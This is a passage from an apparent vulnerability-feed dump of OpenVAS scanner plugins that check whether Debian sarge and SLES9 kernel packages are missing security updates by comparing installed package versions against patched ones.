rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-686\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-686-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-k7\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-k7-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-386\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-586tsc\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-686\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-686-smp\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-k6\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-k7\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.4.27-3-k7-smp\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.6.8-3-386\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.6.8-3-686\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.6.8-3-686-smp\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.6.8-3-k7\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hostap-modules-2.6.8-3-k7-smp\", ver:\"0.3.7-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ndiswrapper-modules-2.6.8-3-386\", ver:\"1.1-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ndiswrapper-modules-2.6.8-3-686\", ver:\"1.1-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ndiswrapper-modules-2.6.8-3-686-smp\", ver:\"1.1-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ndiswrapper-modules-2.6.8-3-k7\", ver:\"1.1-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ndiswrapper-modules-2.6.8-3-k7-smp\", ver:\"1.1-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-itanium\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-itanium-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-mckinley\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-mckinley-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-itanium\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-itanium-smp\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-mckinley\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-mckinley-smp\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-itanium\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-itanium-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-mckinley\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-mckinley-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-itanium\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-itanium-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-mckinley\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-mckinley-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-itanium\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-itanium-smp\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-mckinley\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-mckinley-smp\", ver:\"2.6.8-14sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-itanium\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-itanium-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-mckinley\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-mckinley-smp\", ver:\"2.6.8-14sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-32\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-32-smp\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-64\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-64-smp\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-32\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-32-smp\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-64\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-64-smp\", ver:\"2.6.8-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-32\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-32-smp\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-64\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-64-smp\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-32\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-32-smp\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-64\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-64-smp\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-32\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-32-smp\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-64\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-64-smp\", ver:\"2.6.8-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-32\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-32-smp\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-64\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-64-smp\", ver:\"2.6.8-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-amiga\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-atari\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-bvme6000\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-hp\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-mac\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-mvme147\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-mvme16x\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-q40\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-sun3\", ver:\"2.6.8-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-powerpc\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-powerpc-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-power3\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-power3-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-power4\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-power4-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-powerpc\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-powerpc-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-power3\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-power3-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-power4\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-power4-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-powerpc\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-powerpc-smp\", ver:\"102sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3-power3\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3-power3-smp\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3-power4\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3-power4-smp\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3-powerpc\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3-powerpc-smp\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-power3\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-power3-smp\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-power4\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-power4-smp\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-powerpc\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-powerpc-smp\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-power3\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-power3-smp\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-power4\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-power4-smp\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-powerpc\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-powerpc-smp\", ver:\"2.6.8-12sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-power3\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-power3-smp\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-power4\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-power4-smp\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-powerpc\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-powerpc-smp\", ver:\"2.6.8-12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mol-modules-2.6.8-3-powerpc\", ver:\"0.9.70+2.6.8+12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mol-modules-2.6.8-3-powerpc-smp\", ver:\"0.9.70+2.6.8+12sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-s390\", ver:\"2.6.8-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-s390-tape\", ver:\"2.6.8-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-s390x\", ver:\"2.6.8-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-s390\", ver:\"2.6.8-5sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-s390-tape\", ver:\"2.6.8-5sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-s390x\", ver:\"2.6.8-5sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-sparc32\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-sparc64\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-sparc64-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-sparc32\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-sparc64\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-sparc64-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-2\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.6.8-3\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-sparc32\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-sparc64\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-sparc64-smp\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-sparc32\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-sparc64\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-sparc64-smp\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-sparc32\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-sparc64\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-sparc64-smp\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-sparc32\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-sparc64\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-sparc64-smp\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.6.8\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-debian-2.6.8\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.6.8\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-tree-2.6.8\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.6.8-s390\", ver:\"2.6.8-5sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3358", "CVE-2005-3858", "CVE-2005-3623", "CVE-2005-3356", "CVE-2005-3848"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-smp\n kernel-syms\n um-host-kernel\n kernel-default\n kernel-bigsmp\n um-host-install-initrd\n kernel-source\n kernel-um\n kernel-debug\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010939 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65026", "href": "http://plugins.openvas.org/nasl.php?oid=65026", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010939.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-smp\n kernel-syms\n um-host-kernel\n kernel-default\n kernel-bigsmp\n um-host-install-initrd\n kernel-source\n kernel-um\n kernel-debug\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010939 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65026);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3623\", \"CVE-2005-3848\", \"CVE-2005-3858\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n 